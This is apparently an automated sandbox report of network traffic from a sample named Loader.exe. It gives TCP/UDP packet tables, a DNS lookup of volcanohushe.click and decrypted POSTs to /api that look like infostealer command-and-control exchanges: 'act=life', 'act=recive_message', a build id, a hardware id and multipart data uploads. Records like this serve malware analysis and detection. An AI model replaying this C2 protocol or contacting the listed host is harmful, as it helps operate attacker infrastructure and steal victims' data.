Dec 24, 2024 02:17:21.908049107 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.951360941 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.951531887 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.951576948 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.951602936 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.951620102 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.951647043 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.951657057 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.951682091 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.951698065 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:25.319788933 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:25.319916964 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:25.319989920 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:25.321907997 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:25.321943045 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:25.348287106 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:25.348339081 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:25.348407984 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:25.348864079 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:25.348879099 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:26.564300060 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:26.564440966 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:26.568228960 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:26.568236113 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:26.568559885 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:26.577100039 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:26.577132940 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:26.577197075 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.334988117 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.335495949 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.335530043 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.335576057 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:27.335608959 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.335659981 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:27.336066008 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.343342066 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.343414068 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:27.343422890 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.358155966 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.358227968 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:27.358256102 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.410967112 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:27.410990000 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.454659939 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.454746008 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.454811096 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:27.455106974 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:27.455121040 CET	443	49754	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:27.455158949 CET	49754	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:27.455164909 CET	443	49754	172.67.145.201	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 02:17:03.262599945 CET	60370	53	192.168.2.6	1.1.1.1
Dec 24, 2024 02:17:03.581610918 CET	53	60370	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 02:17:03.262599945 CET	192.168.2.6	1.1.1.1	0xff17	Standard query (0)	volcanohushe.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 02:17:03.581610918 CET	1.1.1.1	192.168.2.6	0xff17	No error (0)	volcanohushe.click		172.67.145.201	A (IP address)	IN (0x0001)	false
Dec 24, 2024 02:17:03.581610918 CET	1.1.1.1	192.168.2.6	0xff17	No error (0)	volcanohushe.click		104.21.71.155	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

volcanohushe.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49708	172.67.145.201	443	504	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:17:05 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: volcanohushe.click
2024-12-24 01:17:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-24 01:17:05 UTC	1130	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:17:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s8u6sj9355c5ebmk3acfmnfa12; expires=Fri, 18 Apr 2025 19:03:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VaSxxOwBbRdjhywXmQRbLwgDKJB7hkJHoonj%2F0cS5dX5NVjiL%2Ff8A6uhRp4Okt92AK6KvqAfFzJ2K43APzbUP4j313jO7kBOcpl2ehspFo4a7uIpNEQ3Gf%2BLix4ovIeyz6XPq%2BY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cbfebbc020f88-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1594&rtt_var=613&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=909&delivery_rate=1762220&cwnd=187&unsent_bytes=0&cid=047d331145215dcc&ts=1023&x=0"
2024-12-24 01:17:05 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-24 01:17:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49709	172.67.145.201	443	504	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:17:07 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 50 Host: volcanohushe.click
2024-12-24 01:17:07 UTC	50	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=pqZnKP--Z2xsZXhl&j=
2024-12-24 01:17:07 UTC	1124	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:17:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1j33b0cn59dhd0d63decobsags; expires=Fri, 18 Apr 2025 19:03:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJbpgHttlEqvLKqfv8%2BG95hUhvQ6Pxz6X6OUE3Z4bZB3Xc2wtL1UsB4C9y1pmBsxDnsnJhQ5jTef%2Bj1ZaA0qhA4MjmH0YTAvg0HNMcx3Oxt6kcsn9R6udOVrehqzS2f0cFK26e4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cbff8fa774285-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1605&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=952&delivery_rate=1584373&cwnd=32&unsent_bytes=0&cid=63b3f402598b77e3&ts=798&x=0"
2024-12-24 01:17:07 UTC	245	IN	Data Raw: 34 39 31 63 0d 0a 4a 38 74 56 77 39 33 33 6d 37 67 33 6d 59 4a 51 4a 6a 42 41 4b 79 50 4b 2b 68 4b 47 4d 57 51 78 76 65 58 38 67 74 41 66 30 65 5a 63 36 53 50 68 35 38 4f 33 6d 6b 54 38 6f 47 70 53 51 6a 56 4f 44 2b 69 62 64 71 51 4c 41 6c 44 52 6c 70 6d 75 38 6d 6d 38 78 42 32 74 4e 4b 2b 75 6b 72 65 61 55 75 47 67 61 6e 31 4c 59 6b 35 4e 36 4d 41 77 34 31 73 47 55 4e 47 48 6e 65 6d 2f 62 37 32 46 54 36 63 79 71 37 69 55 2f 39 6c 62 39 4f 63 31 51 31 45 71 52 55 71 6e 6b 6e 2b 6b 48 55 5a 55 78 38 66 47 6f 4a 31 36 70 59 64 71 71 69 61 6f 2f 34 71 33 77 78 58 38 37 48 49 63 45 69 46 4f 51 61 61 63 64 75 31 5a 44 46 6e 5a 68 70 6a 6f 6f 48 61 33 6a 6b 2b 70 4d 61 71 79 6e 65 76 55 55 66 50 73 4d 30 6c 52 59 67 63 42 72 34 41 Data Ascii: 491cJ8tVw933m7g3mYJQJjBAKyPK+hKGMWQxveX8gtAf0eZc6SPh58O3mkT8oGpSQjVOD+ibdqQLAlDRlpmu8mm8xB2tNK+ukreaUuGgan1LYk5N6MAw41sGUNGHnem/b72FT6cyq7iU/9lb9Oc1Q1EqRUqnkn+kHUZUx8fGoJ16pYdqqiao/4q3wxX87HIcEiFOQaacdu1ZDFnZhpjooHa3jk+pMaqynevUUfPsM0lRYgcBr4A
2024-12-24 01:17:07 UTC	1369	IN	Data Raw: 77 76 42 4e 56 59 64 79 57 6a 2f 57 2f 62 62 58 45 57 75 63 75 34 62 69 5a 75 59 49 56 38 2b 77 38 51 56 45 74 54 6b 43 6f 69 6e 2f 6b 55 41 35 62 32 34 32 52 37 37 31 7a 75 59 4e 4e 6f 44 43 75 75 4a 33 2f 31 56 61 37 72 6e 4a 44 53 6d 49 52 41 59 69 49 63 2b 64 48 43 30 4b 66 6d 4e 44 35 38 6e 71 2f 78 42 33 70 4d 61 2b 2b 6d 50 6e 49 58 66 44 72 4e 31 5a 5a 4b 30 52 4d 71 4a 56 36 36 31 41 47 56 4e 57 4e 6b 65 71 32 63 4c 36 43 52 61 6c 33 37 2f 2b 53 34 5a 6f 4e 75 38 4d 33 56 46 55 75 58 77 4f 53 32 47 2b 71 53 6b 5a 55 30 38 66 47 6f 4c 70 34 73 49 64 4f 70 6a 53 70 74 49 66 35 79 46 50 32 35 53 42 43 56 79 78 44 51 72 71 53 66 75 4a 51 44 31 6a 57 67 70 6e 6b 38 6a 50 7a 67 31 33 70 62 2b 47 65 6d 50 4c 57 58 2b 7a 67 63 6c 73 63 4f 77 6c 47 70 4e Data Ascii: wvBNVYdyWj/W/bbXEWucu4biZuYIV8+w8QVEtTkCoin/kUA5b242R771zuYNNoDCuuJ3/1Va7rnJDSmIRAYiIc+dHC0KfmND58nq/xB3pMa++mPnIXfDrN1ZZK0RMqJV661AGVNWNkeq2cL6CRal37/+S4ZoNu8M3VFUuXwOS2G+qSkZU08fGoLp4sIdOpjSptIf5yFP25SBCVyxDQrqSfuJQD1jWgpnk8jPzg13pb+GemPLWX+zgclscOwlGpN
2024-12-24 01:17:07 UTC	1369	IN	Data Raw: 43 31 2b 66 79 64 37 6e 71 6a 33 72 78 47 2b 71 49 36 4b 31 31 38 7a 5a 57 2f 58 6e 4a 41 52 4e 62 46 41 42 72 35 51 77 76 42 4d 4c 55 74 65 42 6a 4f 2b 2f 66 72 32 4b 53 71 77 34 71 62 2b 56 39 4e 39 52 38 4f 73 78 53 56 59 77 51 30 47 67 6e 58 48 75 57 55 59 64 6e 34 43 47 6f 4f 6f 39 67 70 4e 4f 36 77 4b 69 73 5a 76 2b 7a 42 58 6b 72 69 73 45 56 53 34 4a 47 65 69 56 65 4f 46 57 43 56 4c 56 69 5a 76 71 76 6e 57 39 68 31 65 6d 4d 36 47 7a 6e 66 50 58 57 2f 2f 6f 4f 30 39 5a 4a 45 6c 41 6f 74 67 2b 70 46 51 65 45 34 66 48 71 75 65 2b 63 4c 7a 47 63 4b 6f 35 72 37 69 44 75 63 55 62 34 71 41 31 53 42 4a 36 43 55 32 68 6d 48 76 75 56 77 5a 55 30 6f 4b 64 35 37 46 77 74 49 35 4c 72 6a 4f 74 74 70 6a 2f 32 6c 4c 2f 35 53 42 42 57 79 35 46 41 65 62 59 64 2f 77 Data Ascii: C1+fyd7nqj3rxG+qI6K118zZW/XnJARNbFABr5QwvBMLUteBjO+/fr2KSqw4qb+V9N9R8OsxSVYwQ0GgnXHuWUYdn4CGoOo9gpNO6wKisZv+zBXkrisEVS4JGeiVeOFWCVLViZvqvnW9h1emM6GznfPXW//oO09ZJElAotg+pFQeE4fHque+cLzGcKo5r7iDucUb4qA1SBJ6CU2hmHvuVwZU0oKd57FwtI5LrjOttpj/2lL/5SBBWy5FAebYd/w
2024-12-24 01:17:07 UTC	1369	IN	Data Raw: 34 43 53 6f 4f 6f 39 75 6f 31 58 70 7a 6d 6f 73 70 50 78 33 56 76 32 36 7a 52 50 56 53 56 50 54 4b 43 56 64 65 64 53 41 6c 6e 4e 68 4a 58 71 76 33 66 7a 79 67 57 75 4c 2b 48 6e 31 64 37 57 66 4f 76 37 49 46 49 53 50 51 64 59 36 4a 39 38 70 41 74 47 55 4e 43 4f 6b 65 69 36 63 72 79 41 53 36 38 78 72 4c 71 61 38 38 68 64 39 65 30 35 53 31 6b 77 53 55 79 73 6c 48 54 73 57 41 77 54 6b 63 65 5a 2b 50 49 6c 38 37 46 49 70 6a 65 69 71 64 58 6d 6c 45 79 37 35 7a 34 45 43 6d 4a 46 54 36 69 58 66 4f 68 59 44 6c 4c 54 69 5a 6e 6c 75 33 57 37 6c 6b 53 74 50 36 43 78 6d 76 6a 65 55 50 37 6b 4e 55 42 55 4c 51 6b 50 36 4a 39 6f 70 41 74 47 66 50 69 79 33 4d 47 49 50 61 7a 4b 58 4f 6b 77 72 66 2f 4e 75 64 5a 57 39 2b 67 39 51 6c 73 75 51 30 69 6a 6c 48 76 67 58 77 39 57 Data Ascii: 4CSoOo9uo1XpzmospPx3Vv26zRPVSVPTKCVdedSAlnNhJXqv3fzygWuL+Hn1d7WfOv7IFISPQdY6J98pAtGUNCOkei6cryAS68xrLqa88hd9e05S1kwSUyslHTsWAwTkceZ+PIl87FIpjeiqdXmlEy75z4ECmJFT6iXfOhYDlLTiZnlu3W7lkStP6CxmvjeUP7kNUBULQkP6J9opAtGfPiy3MGIPazKXOkwrf/NudZW9+g9QlsuQ0ijlHvgXw9W
2024-12-24 01:17:07 UTC	1369	IN	Data Raw: 47 30 62 37 53 4e 56 36 63 36 72 72 65 64 38 4e 74 52 2f 75 30 30 53 46 67 6a 54 6b 2b 6d 6b 44 43 71 45 77 46 4c 6e 39 2f 65 77 61 4a 6d 6f 5a 4a 49 69 44 71 75 2f 34 71 33 77 78 58 38 37 48 49 63 45 69 74 62 52 61 57 4b 65 65 4e 64 43 56 44 4e 68 70 50 72 6f 48 71 38 67 45 4b 6c 4d 61 36 35 6c 50 7a 51 57 66 7a 6c 4f 55 74 65 59 67 63 42 72 34 41 77 76 42 4d 6f 57 4d 79 51 6e 65 36 35 61 36 6a 45 57 75 63 75 34 62 69 5a 75 59 49 56 2b 4f 73 35 51 46 49 75 53 55 57 6c 6d 47 4c 72 56 41 46 61 31 4a 57 55 35 37 56 32 75 34 39 4b 72 79 57 74 73 59 66 38 79 45 65 37 72 6e 4a 44 53 6d 49 52 41 5a 36 66 59 50 52 51 52 47 4c 4a 68 49 6a 72 76 33 48 7a 6d 77 75 77 64 36 61 7a 31 61 47 61 55 2f 54 70 4d 55 74 54 4b 30 56 4d 72 5a 46 31 35 56 55 43 57 64 57 48 6d Data Ascii: G0b7SNV6c6rred8NtR/u00SFgjTk+mkDCqEwFLn9/ewaJmoZJIiDqu/4q3wxX87HIcEitbRaWKeeNdCVDNhpProHq8gEKlMa65lPzQWfzlOUteYgcBr4AwvBMoWMyQne65a6jEWucu4biZuYIV+Os5QFIuSUWlmGLrVAFa1JWU57V2u49KryWtsYf8yEe7rnJDSmIRAZ6fYPRQRGLJhIjrv3Hzmwuwd6az1aGaU/TpMUtTK0VMrZF15VUCWdWHm
2024-12-24 01:17:07 UTC	1369	IN	Data Raw: 39 6e 51 57 75 4f 2b 48 6e 31 66 72 64 56 76 72 71 4f 30 68 64 4a 55 31 54 6f 70 39 69 35 56 49 4e 58 74 4f 48 6b 2b 32 34 66 4c 71 4a 53 61 51 77 70 72 43 51 75 5a 51 56 2f 50 68 79 48 42 49 44 52 45 71 6b 77 79 71 6b 54 45 68 4b 6e 34 43 53 6f 4f 6f 39 73 34 35 41 6f 7a 71 69 73 4a 62 72 32 31 50 70 34 44 39 4f 51 43 68 43 52 4b 57 56 66 65 64 56 41 46 6a 54 6c 5a 66 67 73 58 62 7a 79 67 57 75 4c 2b 48 6e 31 64 72 4e 51 2f 48 6e 50 6c 4a 5a 49 30 70 58 70 59 67 77 71 68 4d 58 56 4d 37 48 78 76 61 69 61 72 53 62 43 37 42 33 70 72 50 56 6f 5a 70 54 38 75 59 31 51 6c 77 77 54 45 65 6e 6c 33 6e 74 56 77 35 51 33 34 4f 61 35 37 64 2b 76 34 39 43 71 6a 69 6c 74 70 76 77 31 52 57 31 6f 44 56 63 45 6e 6f 4a 59 4c 4f 62 66 4f 6b 54 47 52 33 47 78 35 6e 73 38 69 Data Ascii: 9nQWuO+Hn1frdVvrqO0hdJU1Top9i5VINXtOHk+24fLqJSaQwprCQuZQV/PhyHBIDREqkwyqkTEhKn4CSoOo9s45AozqisJbr21Pp4D9OQChCRKWVfedVAFjTlZfgsXbzygWuL+Hn1drNQ/HnPlJZI0pXpYgwqhMXVM7HxvaiarSbC7B3prPVoZpT8uY1QlwwTEenl3ntVw5Q34Oa57d+v49Cqjiltpvw1RW1oDVcEnoJYLObfOkTGR3Gx5ns8i
2024-12-24 01:17:07 UTC	1369	IN	Data Raw: 36 52 65 71 71 5a 44 2b 7a 42 66 4f 34 7a 78 4b 56 54 51 4a 58 70 66 57 4d 4f 74 4a 52 67 76 6d 6e 74 37 6e 76 6a 33 72 78 46 43 75 4e 36 61 6c 67 2f 37 57 52 50 44 74 50 6d 5a 64 4a 56 39 43 70 35 74 68 37 52 38 4e 58 70 2f 4a 33 75 65 71 50 65 76 45 61 71 34 68 6f 70 43 57 36 4e 4d 56 74 61 41 31 55 68 4a 36 43 58 2f 6f 69 6e 50 30 55 41 6c 43 34 63 66 47 2b 59 77 39 75 4a 4a 43 75 54 53 33 74 4a 6a 31 79 32 75 37 75 47 59 57 41 48 41 62 45 37 66 59 62 39 73 64 52 6c 4b 66 33 36 66 35 38 6d 76 7a 33 42 66 6e 64 37 50 2f 7a 62 6d 64 56 75 6e 79 4e 45 64 45 49 51 35 2f 6c 72 39 6d 37 6c 51 57 56 4d 69 49 33 71 37 79 63 76 50 63 66 4f 6b 2b 70 71 53 45 37 39 64 46 2f 4b 41 4e 43 68 49 36 43 52 6e 6f 72 58 50 71 58 51 46 46 7a 73 71 35 39 72 68 36 6f 34 4e Data Ascii: 6ReqqZD+zBfO4zxKVTQJXpfWMOtJRgvmnt7nvj3rxFCuN6alg/7WRPDtPmZdJV9Cp5th7R8NXp/J3ueqPevEaq4hopCW6NMVtaA1UhJ6CX/oinP0UAlC4cfG+Yw9uJJCuTS3tJj1y2u7uGYWAHAbE7fYb9sdRlKf36f58mvz3Bfnd7P/zbmdVunyNEdEIQ5/lr9m7lQWVMiI3q7ycvPcfOk+pqSE79dF/KANChI6CRnorXPqXQFFzsq59rh6o4N
2024-12-24 01:17:07 UTC	1369	IN	Data Raw: 76 4f 62 38 74 70 53 36 2f 59 70 43 46 6f 68 55 31 75 57 70 6c 76 6f 56 51 46 4a 32 49 47 34 77 50 49 7a 38 34 73 46 38 51 37 68 39 39 58 47 6c 42 58 6a 6f 47 6f 45 5a 79 46 48 54 36 2b 4f 59 61 6c 37 4a 57 6e 6c 78 62 4c 6e 70 7a 2b 48 67 31 57 34 50 4b 79 7a 31 62 65 61 55 37 75 34 59 67 6f 53 4a 6c 67 42 38 4d 67 69 76 77 5a 56 42 49 2f 56 67 61 36 72 50 61 58 45 48 66 74 35 34 61 33 56 6f 5a 6f 53 2b 50 49 67 51 6c 45 30 53 67 61 57 70 6c 66 71 56 41 64 46 7a 35 43 52 33 6f 78 6f 73 49 70 4c 72 69 47 77 2f 39 75 35 31 52 57 6a 32 58 49 4d 45 68 30 48 41 62 44 59 4b 4b 52 6d 42 56 33 52 67 49 6a 78 2f 31 71 39 67 30 53 2f 4a 37 61 77 31 62 65 61 55 37 75 34 59 41 6f 53 4a 6c 67 42 38 4d 67 69 76 77 5a 56 42 49 2f 56 67 61 36 72 50 61 58 45 48 66 74 35 Data Ascii: vOb8tpS6/YpCFohU1uWplvoVQFJ2IG4wPIz84sF8Q7h99XGlBXjoGoEZyFHT6+OYal7JWnlxbLnpz+Hg1W4PKyz1beaU7u4YgoSJlgB8MgivwZVBI/Vga6rPaXEHft54a3VoZoS+PIgQlE0SgaWplfqVAdFz5CR3oxosIpLriGw/9u51RWj2XIMEh0HAbDYKKRmBV3RgIjx/1q9g0S/J7aw1beaU7u4YAoSJlgB8MgivwZVBI/Vga6rPaXEHft5
2024-12-24 01:17:07 UTC	1369	IN	Data Raw: 76 36 55 75 33 6a 63 67 6f 53 4c 67 6b 5a 36 4a 6c 36 39 46 34 4a 56 4a 4f 41 68 4f 66 79 4d 2f 4f 4b 42 66 46 33 6f 4c 57 46 39 4e 56 53 74 2b 59 38 53 68 49 39 42 31 6a 6f 6a 6a 43 38 41 45 67 54 7a 63 66 47 6f 50 56 2b 6f 5a 5a 44 71 69 47 69 2b 4b 76 48 39 30 66 38 38 44 45 47 59 79 39 4e 56 37 32 62 59 4f 4e 74 4f 48 37 4e 67 49 37 6a 38 45 79 6c 68 30 57 6e 4d 4f 48 78 31 65 47 61 44 62 76 4e 49 45 4e 43 49 51 6b 50 36 4a 51 77 76 42 4d 4c 51 64 69 58 6e 61 79 31 5a 37 54 45 57 75 63 75 34 61 6e 56 6f 59 6b 62 75 2f 4a 79 48 42 4a 6c 52 30 79 70 6d 33 37 6e 51 52 52 56 33 4a 47 64 70 34 78 44 6e 70 5a 43 75 54 54 6a 6a 70 6a 39 7a 45 44 34 38 44 56 36 62 41 39 62 52 72 69 62 4d 73 68 55 43 31 2f 68 75 61 6e 78 74 57 33 78 6f 6b 61 2f 4e 4f 48 78 31 Data Ascii: v6Uu3jcgoSLgkZ6Jl69F4JVJOAhOfyM/OKBfF3oLWF9NVSt+Y8ShI9B1jojjC8AEgTzcfGoPV+oZZDqiGi+KvH90f88DEGYy9NV72bYONtOH7NgI7j8Eylh0WnMOHx1eGaDbvNIENCIQkP6JQwvBMLQdiXnay1Z7TEWucu4anVoYkbu/JyHBJlR0ypm37nQRRV3JGdp4xDnpZCuTTjjpj9zED48DV6bA9bRribMshUC1/huanxtW3xoka/NOHx1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49710	172.67.145.201	443	504	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:17:09 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SG98CQFNYP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12814 Host: volcanohushe.click
2024-12-24 01:17:09 UTC	12814	OUT	Data Raw: 2d 2d 53 47 39 38 43 51 46 4e 59 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 37 44 30 42 36 41 35 33 41 45 45 33 36 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 53 47 39 38 43 51 46 4e 59 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 47 39 38 43 51 46 4e 59 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 53 47 39 38 43 51 46 4e 59 50 0d 0a 43 6f 6e 74 65 Data Ascii: --SG98CQFNYPContent-Disposition: form-data; name="hwid"E887D0B6A53AEE368246926E533C64D7--SG98CQFNYPContent-Disposition: form-data; name="pid"2--SG98CQFNYPContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--SG98CQFNYPConte
2024-12-24 01:17:10 UTC	1134	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:17:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q20vmunt3jnf42kd8hvgi1ijnj; expires=Fri, 18 Apr 2025 19:03:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=brq67tuODW7O9k1YLmh9fmjoGr1lXi5IhDAK9yJxSKoTqaWC%2BWhc%2FMGFBx9LUzoq84%2FoOp5tZSIeYZ1QbNC3kWnh6OOlEW9z4F9xjBB9JkUKm6VPgSR%2BEK8uGK4c0OdRAzAqZJ8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cc00738868cc6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1916&rtt_var=727&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2842&recv_bytes=13748&delivery_rate=1495901&cwnd=222&unsent_bytes=0&cid=d547dbcfa627943d&ts=1079&x=0"
2024-12-24 01:17:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 01:17:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49712	172.67.145.201	443	504	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:17:12 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=THM6ZXIUPF3JTH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15084 Host: volcanohushe.click
